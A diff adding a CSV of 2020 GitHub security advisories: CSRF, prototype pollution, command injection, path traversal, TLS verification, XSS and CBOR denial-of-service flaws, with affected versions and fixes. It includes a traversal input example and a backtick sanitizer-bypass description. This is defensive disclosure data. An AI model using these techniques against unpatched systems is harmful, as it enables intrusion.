diff --git "a/github-advisory-2020.csv" "b/github-advisory-2020.csv"
new file mode 100644--- /dev/null
+++ "b/github-advisory-2020.csv"
@@ -0,0 +1,15717 @@
+schema_version,id,modified,published,withdrawn,aliases,summary,details,severity,affected,references,database_specific
+1.4.0,GHSA-xq5j-gw7f-jgj8,2023-08-08T15:14:47Z,2020-07-07T16:34:10Z,,['CVE-2020-8167'],CSRF Vulnerability in rails-ujs,"There is a vulnerability in rails-ujs that allows attackers to send CSRF tokens to wrong domains.
+
+Versions Affected: rails <= 6.0.3
+Not affected: Applications which don't use rails-ujs.
+Fixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1
+
+Impact
+------
+
+This is a regression of CVE-2015-1840.
+
+In the scenario where an attacker might be able to control the href attribute of an anchor tag or the action attribute of a form tag that will trigger a POST action, the attacker can set the href or action to a cross-origin URL, and the CSRF token will be sent.
+
+Workarounds
+-----------
+
+To work around this problem, change code that allows users to control the href attribute of an anchor tag or the action attribute of a form tag to filter the user parameters.
+
+For example, code like this:
+
+ link_to params
+
+to code like this:
+
+ link_to filtered_params
+
+ def filtered_params
+ # Filter just the parameters that you trust
+ end","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionview'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.4.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.4.2'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionview'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8167'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/189878'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-8167.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/rubyonrails-security/x9DixQDG9a0'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/x9DixQDG9a0'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4766'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-07T15:51:37Z', 'nvd_published_at': '2020-06-19T18:15:00Z'}"
+1.4.0,GHSA-ff7x-qrg7-qggm,2022-08-11T14:58:19Z,2020-07-29T20:56:59Z,,['CVE-2020-8116'],dot-prop Prototype Pollution vulnerability,Prototype pollution vulnerability in dot-prop npm package versions before 4.2.1 and versions 5.x before 5.1.1 allows an attacker to add arbitrary properties to JavaScript language constructs such as objects.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'dot-prop'}, 'ecosystem_specific': {'affected_functions': ['dot-prop.set']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dot-prop'}, 'ecosystem_specific': {'affected_functions': ['dot-prop.set']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8116'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/dot-prop/issues/63'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/dot-prop/commit/3039c8c07f6fdaa8b595ec869ae0895686a7a0f2'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/dot-prop/commit/c914124f418f55edea27928e89c94d931babe587'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/719856'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-ff7x-qrg7-qggm'}, {'type': 'PACKAGE', 'url': 'https://github.com/sindresorhus/dot-prop'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/dot-prop/tree/v4'}]","{'cwe_ids': ['CWE-1321', 'CWE-425', 'CWE-471'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T20:51:37Z', 'nvd_published_at': '2020-02-04T20:15:00Z'}"
+1.4.0,GHSA-976r-qfjj-c24w,2021-09-22T21:16:56Z,2020-07-27T16:57:33Z,,['CVE-2020-11981'],Command injection via Celery broker in Apache Airflow,"An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ecosystem_specific': {'affected_functions': ['airflow.www_rbac.views.Airflow.index']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11981'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/commit/afa4b11fddfdbadb048f742cf66d5c21c675a5c8'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20220427031325/https://issues.apache.org/jira/browse/AIRFLOW-6351'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T16:55:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-34gh-3cwv-wvp2,2021-09-23T17:29:15Z,2020-07-29T18:07:11Z,,['CVE-2020-7683'],Directory traversal in rollup-plugin-server,This affects all versions of package rollup-plugin-server. There is no path sanitization in readFile operation performed inside the readFileFromContentBase function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'rollup-plugin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7683'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ROLLUPPLUGINSERVER-590123'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T17:45:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fpqv-x9hm-35j9,2021-09-23T18:13:50Z,2020-07-31T17:39:22Z,,['CVE-2020-16095'],Potential XSS vulnerability in Kitodo.Presentation,"### Impact
+Kitodo.Presentation fails to properly encode URL parameters for output in HTML making it vulnerable to Cross Site Scripting (XSS). Only sites using the `ListView`, `Navigation` or `PageView` plugins are affected.
+
+It also includes jQuery 3.4.1 which is known to be vulnerable against Cross Site Scripting, although there is currently no known way to exploit this in Kitodo.Presentation.
+
+### Patches
+An updated version of Kitodo.Presentation is available on [GitHub](https://github.com/kitodo/kitodo-presentation/releases/tag/v3.1.2), [Packagist](https://packagist.org/packages/kitodo/presentation#v3.1.2) and in the [TYPO3 Extension Repository](https://extensions.typo3.org/extension/dlf/). Users are advised to update as soon as possible.
+
+The issue was also fixed in release 2.3.1 of the 2.x branch, although it is generally not recommended to run this branch since it depends on an outdated TYPO3 version.
+
+### References
+TYPO3 Security Advisory [TYPO3-EXT-SA-2020-015](https://typo3.org/security/advisory/typo3-ext-sa-2020-015)
+jQuery Security Advisory [GHSA-gxr4-xjj5-5px2](https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2)
+Open Bug Bounty Report [OBB-1219978](https://www.openbugbounty.org/reports/1219978/)
+
+### Contact
+If you have any questions or comments about this advisory:
+* [Open an issue](https://github.com/kitodo/kitodo-presentation/issues/new/choose)
+* Email us at [security@kitodo.org](mailto:security@kitodo.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kitodo/presentation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kitodo/kitodo-presentation/security/advisories/GHSA-fpqv-x9hm-35j9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-16095'}, {'type': 'WEB', 'url': 'https://github.com/kitodo/kitodo-presentation/commit/6a67256388350cc69efa7f36bbaee50c919ca23c'}, {'type': 'PACKAGE', 'url': 'https://github.com/kitodo/kitodo-presentation'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-015'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-30T15:07:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xp63-6vf5-xf3v,2021-01-07T23:47:13Z,2020-07-20T17:20:20Z,,['CVE-2020-15123'],Command injection in codecov (npm package),"### Impact
+
+The `upload` method has a command injection vulnerability. Clients of the `codecov-node` library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
+
+A similar CVE was issued: [CVE-2020-7597](https://github.com/advisories/GHSA-5q88-cjfq-g2mh), but the fix was incomplete. It only blocked `&`, and command injection is still possible using backticks instead to bypass the sanitizer.
+
+We have written a [CodeQL](https://codeql.com) query, which automatically detects this vulnerability. You can see the results of the query on the `codecov-node` project [here](https://lgtm.com/query/7714424068617023832/).
+
+
+### Patches
+This has been patched in version 3.7.1
+
+### Workarounds
+
+None, however, the attack surface is low in this case. Particularly in the standard use of codecov, where the module is used directly in a build pipeline, not built against as a library in another application that may supply malicious input and perform command injection.
+
+### References
+* [CVE-2020-7597](https://github.com/advisories/GHSA-5q88-cjfq-g2mh)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Contact us via our [Security Email](mailto:security@codecov.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'codecov'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/codecov/codecov-node/security/advisories/GHSA-xp63-6vf5-xf3v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15123'}, {'type': 'WEB', 'url': 'https://github.com/codecov/codecov-node/pull/180'}, {'type': 'WEB', 'url': 'https://github.com/codecov/codecov-node/commit/c0711c656686e902af2cd92d6aecc8074de4d83d'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-5q88-cjfq-g2mh'}, {'type': 'WEB', 'url': 'https://lgtm.com/query/7714424068617023832'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-20T17:19:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gprm-xqrc-c2j3,2021-09-22T21:56:35Z,2020-07-27T22:51:44Z,,['CVE-2020-1956'],Command Injection in Kylin,"Kylin has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.kylin:kylin-core-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.kylin:kylin-core-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1956'}, {'type': 'WEB', 'url': 'https://github.com/apache/kylin/commit/58fad56ac6aaa43c6bd8f962d7f2d84438664092'}, {'type': 'WEB', 'url': 'https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/kylin'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1332ef34cf8e2c0589cf44ad269fb1fb4c06addec6297f0320f5111d%40%3Cuser.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r250a867961cfd6e0506240a9c7eaee782d84c6ab0091c7c4bc45f3eb@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r250a867961cfd6e0506240a9c7eaee782d84c6ab0091c7c4bc45f3eb@%3Cdev.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r250a867961cfd6e0506240a9c7eaee782d84c6ab0091c7c4bc45f3eb@%3Cuser.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r61666760d8a4e8764b2d5fe158d8a48b569414480fbfadede574cdc0@%3Ccommits.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEKYLIN-570207'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/07/14/1'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T22:50:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9h4g-27m8-qjrg,2021-09-22T20:28:29Z,2020-07-07T19:24:47Z,,['CVE-2020-15779'],Path Traversal in socket.io-file,"All versions of `socket.io-file` are vulnerable to Path Traversal. The package fails to sanitize user input and uses it to generate the file upload paths. The `socket.io-file::createFile` message contains a `name` option that is passed directly to `path.join()`. It is possible to upload files to arbitrary folders on the server by sending relative paths on the `name` value, such as `../../test.js`. The `uploadDir` and `rename` options can be used to define the file upload path.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'socket.io-file'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.31'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15779'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-9h4g-27m8-qjrg'}, {'type': 'PACKAGE', 'url': 'https://github.com/rico345100/socket.io-file'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1519'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/socket.io-file'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-07T19:23:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jcq3-cprp-m333,2021-09-22T18:47:45Z,2020-07-01T17:12:20Z,,['CVE-2019-2692'],Privilege escalation in mysql-connector-jav,"Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 8.0.15 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Connectors executes to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'mysql:mysql-connector-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.0.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-2692'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20190423-0002/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-MYSQL-174574'}, {'type': 'WEB', 'url': 'http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/107925'}]","{'cwe_ids': ['CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-01T17:11:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3q49-h8f9-9fr9,2023-05-16T16:03:45Z,2020-07-31T17:39:42Z,,['CVE-2020-15134'],Missing TLS certificate verification,"Faye uses [em-http-request][6] and [faye-websocket][10] in the Ruby version of its client. Those libraries both use the [`EM::Connection#start_tls`][1] method in [EventMachine][2] to implement the TLS handshake whenever a `wss:` URL is used for the connection. This method does not implement certificate verification by default, meaning that it does not check that the server presents a valid and trusted TLS certificate for the expected hostname. That means that any `https:` or `wss:` connection made using these libraries is vulnerable to a man-in-the-middle attack, since it does not confirm the identity of the server it is connected to.
+
+The first request a Faye client makes is always sent via normal HTTP, but later messages may be sent via WebSocket. Therefore it is vulnerable to the same problem that these underlying libraries are, and we needed both libraries to support TLS verification before Faye could claim to do the same. Your client would still be insecure if its initial HTTPS request was verified, but later WebSocket connections were not.
+
+This has been a requested feature in EventMachine for many years now; see for example [#275][3], [#378][4], and [#814][5]. In June 2020, em-http-request published an [advisory][7] related to this problem and fixed it by [implementing TLS verification][8] in their own codebase; although EventMachine does not implement certificate verification itself, it provides an extension point for
+the caller to implement it, called [`ssl_verify_peer`][9]. Based on this implementation, we have incorporated similar functionality into faye-websocket.
+
+After implementing verification in v1.1.6, em-http-request has elected to leave the `:verify_peer` option switched off by default. We have decided to _enable_ this option by default in Faye, but are publishing a minor release with added functionality for configuring it. We are mindful of the fact that this may break existing programs, but we consider it much more important that all clients have TLS verification turned on by default. A client that is not carrying out verification is either:
+
+- talking to the expected server, and will not break under this change
+- being attacked, and would benefit from being alerted to this fact
+- deliberately talking to a server that would be rejected by verification
+
+The latter case includes situations like talking to a non-public server using a self-signed certificate. We consider this use case to be ""working by accident"", rather than functionality that was actively supported, and it should be properly and explicitly supported instead.
+
+We are releasing Faye v1.4.0, which enables verification by default and provides a way to opt out of it:
+
+```rb
+client = Faye::Client.new('https://example.com/', tls: { verify_peer: false })
+```
+
+Unfortunately we can't offer an equivalent of the `:root_cert_file` option that has been added to faye-websocket, because em-http-request does not support it. If you need to talk to servers whose certificates are not recognised by your default root certificates, then you need to add its certificate (or another one that can verify it) to your system's root set.
+
+The same functionality is now supported in the Node.js version, with a `tls` option whose values will be passed to the `https` and `tls` modules as appropriate when making connections. For example, you can provide your own CA certificate:
+
+```js
+var client = new faye.Client('https://example.com/', {
+ tls: {
+ ca: fs.readFileSync('path/to/certificate.pem')
+ }
+});
+```
+
+For further background information on this issue, please see [faye#524][12] and [faye-websocket#129][13]. We would like to thank [Tero Marttila][14] and [Daniel Morsing][15] for providing invaluable assistance and feedback on this issue.
+
+[1]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls
+[2]: https://rubygems.org/gems/eventmachine
+[3]: https://github.com/eventmachine/eventmachine/issues/275
+[4]: https://github.com/eventmachine/eventmachine/pull/378
+[5]: https://github.com/eventmachine/eventmachine/issues/814
+[6]: https://rubygems.org/gems/em-http-request
+[7]: https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request
+[8]: https://github.com/igrigorik/em-http-request/pull/340
+[9]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer
+[10]: https://rubygems.org/gems/faye-websocket
+[11]: https://faye.jcoglan.com/
+[12]: https://github.com/faye/faye/issues/524
+[13]: https://github.com/faye/faye-websocket-ruby/pull/129
+[14]: https://github.com/SpComb
+[15]: https://github.com/DanielMorsing","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'faye'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/faye/faye/security/advisories/GHSA-3q49-h8f9-9fr9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15134'}, {'type': 'WEB', 'url': 'https://github.com/eventmachine/eventmachine/issues/275'}, {'type': 'WEB', 'url': 'https://github.com/eventmachine/eventmachine/issues/814'}, {'type': 'WEB', 'url': 'https://github.com/faye/faye/issues/524'}, {'type': 'WEB', 'url': 'https://github.com/eventmachine/eventmachine/pull/378'}, {'type': 'WEB', 'url': 'https://github.com/faye/faye-websocket-ruby/pull/129'}, {'type': 'WEB', 'url': 'https://github.com/igrigorik/em-http-request/pull/340'}, {'type': 'WEB', 'url': 'https://blog.jcoglan.com/2020/07/31/missing-tls-verification-in-faye/'}, {'type': 'PACKAGE', 'url': 'https://github.com/faye/faye'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faye/CVE-2020-15134.yml'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request'}, {'type': 'WEB', 'url': 'https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer'}, {'type': 'WEB', 'url': 'https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-31T17:38:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2jpm-827p-j44g,2021-01-07T23:47:19Z,2020-07-09T18:28:07Z,,['CVE-2020-15092'],Stored XSS in TimelineJS3,"### Impact
+TimelineJS renders some user data as HTML. An attacker could implement an XSS exploit with maliciously crafted content in a number of data fields. This risk is present whether the source data for the timeline is stored on Google Sheets or in a JSON configuration file.
+
+Most TimelineJS users configure their timeline with a Google Sheets document. Those users are exposed to this vulnerability if they grant write access to the document to a malicious inside attacker, if the access of a trusted user is compromised, or if they grant public write access to the document.
+
+Some TimelineJS users configure their timeline with a JSON document. Those users are exposed to this vulnerability if they grant write access to the document to a malicious inside attacker, if the access of a trusted user is compromised, or if write access to the system hosting that document is otherwise compromised.
+
+Although the vulnerability has a [CVSS v3.1 base score of 7.2](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H), this vulnerability has a severity of Moderate due to the likeliness of exploitation.
+
+### Patches
+Version 3.7.0 of TimelineJS addresses this in two ways.
+
+1. For content which is intended to support limited HTML markup for styling and linking, that content is ""sanitized"" before being added to the DOM.
+1. For content intended for simple text display, all markup is stripped.
+
+Very few users of TimelineJS actually install the TimelineJS code on their server. Most users publish a timeline using a URL hosted on systems we control. The fix for this issue is published to our system such that **those users will automatically begin using the new code**. The only exception would be users who have deliberately edited the embed URL to ""pin"" their timeline to an earlier version of the code.
+
+Some users of TimelineJS use it as a part of a [wordpress plugin](https://wordpress.org/plugins/knight-lab-timelinejs/). Version 3.7.0.0 of that plugin and newer integrate the updated code. Users are encouraged to update the plugin rather than manually update the embedded version of TimelineJS.
+
+### Workarounds
+To exploit this vulnerability, the attacker must have write access to the data source for the Timeline or the server which embeds the timeline.
+
+Thus, the only workaround is appropriate attention to securing write access to the Google Sheet or JSON file which serves as the data source.
+
+### References
+For more about the release of TimelineJS which addresses this vulnerability, see the [Knight Lab website](https://knightlab.northwestern.edu/2020/07/09/timelinejs-update/index.html).
+
+A technical write-up of this vulnerability is available [here](https://zanderwork.com/blog/cve-2020-15092/).
+
+### Acknowledgements
+
+This vulnerability was discovered by Zander Work ([@captainGeech42](https://twitter.com/captainGeech42)) of Oregon State University.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [GitHub](https://github.com/NUKnightLab/TimelineJS3/issues)
+* File a support request in our [helpdesk system](https://knightlab.zendesk.com/hc/en-us/requests/new)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@knight-lab/timelinejs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NUKnightLab/TimelineJS3/security/advisories/GHSA-2jpm-827p-j44g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15092'}, {'type': 'WEB', 'url': 'https://knightlab.northwestern.edu/2020/07/09/timelinejs-update/index.html'}, {'type': 'WEB', 'url': 'https://knightlab.northwestern.edu/posts/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-09T18:27:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mm44-wc5p-wqhq,2022-01-18T23:05:18Z,2020-07-07T16:45:24Z,,[],Denial of service due to reference expansion in versions earlier than 4.0,"### Impact
+
+The CBOR library supports optional tags that enable CBOR objects to contain references to objects within them. Versions earlier than 4.0 resolved those references automatically. While this by itself doesn't cause much of a security problem, a denial of service can happen if those references are deeply nested and used multiple times (so that the same reference to the same object occurs multiple times), and if the decoded CBOR object is sent to a serialization method such as EncodeToBytes, ToString, or ToJSONString, since the objects referred to are expanded in the process and take up orders of magnitude more memory than if the references weren't resolved.
+
+The impact of this problem on any particular system varies. In general, the risk is higher if the system allows users to send arbitrary CBOR objects without authentication, or exposes a remote endpoint in which arbitrary CBOR objects can be sent without authentication.
+
+### Patches
+
+This problem is addressed in version 4.0 by disabling reference resolution by default. Users should use the latest version of this library.
+
+### Workarounds
+
+Since version 3.6, an encoding option (`resolvereferences=true` or `resolvereferences=false`) in CBOREncodeOptions sets whether the CBOR processor will resolve these kinds of references when decoding a CBOR object. Set `resolvereferences=false` to disable reference resolution.
+
+In version 3.6, if the method used CBORObject.Read() or CBORObject.DecodeFromBytes() to decode a serialized CBOR object, call the overload that takes CBOREncodeOptions as follows:
+
+ CBORObject.DecodeFromBytes(bytes, new CBOREncodeOptions(""resolvereferences=false""));
+
+In versions 3.5 and earlier, this issue is present only if the CBOR object is an array or a map. If the application does not expect a decoded CBOR object to be an array or a map, it should check the CBOR object's type before encoding that object, as follows:
+
+ if (cbor.Type != CBORType.Array && cbor.Type != CBORType.Map) {
+ cbor.EncodeToBytes();
+ }
+
+Alternatively, for such versions, the application can use WriteTo to decode the CBOR object to a so-called ""limited memory stream"", that is, a Stream that throws an exception if too many bytes would be written. How to write such a limited-memory stream is nontrivial and beyond the scope of this advisory.
+
+ LimitedMemoryStream stream = new LimitedMemoryStream(100000); // Limit to 100000 bytes
+ cbor.WriteTo(stream);
+ return stream.ToBytes();
+
+To check whether a byte array representing a CBOR object might exhibit this problem, check whether the array contains the byte 0xd8 followed immediately by either 0x19 or 0x1d. This check catches all affected CBOR objects but may catch some non-affected CBOR objects (notably integers and byte strings).
+
+### References
+
+See the Wikipedia article [Billion laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack) and the related issue in [Kubernetes](https://github.com/kubernetes/kubernetes/issues/83253).
+
+### For more information
+
+If you have any questions or comments about this advisory, open an issue in [the CBOR repository](https://github.com/peteroupc/cbor-java).
+",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.upokecenter:cbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/peteroupc/CBOR-Java/security/advisories/GHSA-mm44-wc5p-wqhq'}, {'type': 'PACKAGE', 'url': 'https://github.com/peteroupc/CBOR-Java'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-07T16:45:07Z', 'nvd_published_at': None}"
